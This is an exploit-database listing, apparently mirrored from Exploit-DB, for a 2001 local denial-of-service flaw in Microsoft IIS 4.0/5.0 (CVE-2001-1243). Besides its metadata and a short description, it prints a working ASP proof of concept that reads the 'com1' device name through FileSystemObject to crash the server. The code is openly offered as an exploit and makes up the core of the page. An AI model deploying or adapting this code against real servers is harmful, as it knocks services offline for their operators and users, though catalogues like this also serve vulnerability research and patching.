[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft IIS 4.0/5.0 - Device File Local Denial of Service

Author: VIPER_SV
type: dos
platform: windows
port: 
date_added: 2001-07-04 
date_updated: 2012-09-01 
verified: 1 
codes: CVE-2001-1243;OSVDB-14229 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/2973/info

Microsoft IIS is prone to denial of service attacks by local users. This issue is exploitable if the local attacker can create an .asp file which makes calls to various devices names. The local attacker must of course possess the privileges required to create such files.

The end result of exploiting this vulnerability is that the server will crash and a denial of services will occur. The affected services must be restarted to regain normal functionality.

<%
  Dim strFileName, objFSO, objFile

  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

  strFileName = "com1"

  Set objFile = objFSO.OpenTextFile(strFileName)

  Response.Write objFile.ReadAll

  objFile.Close

%>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.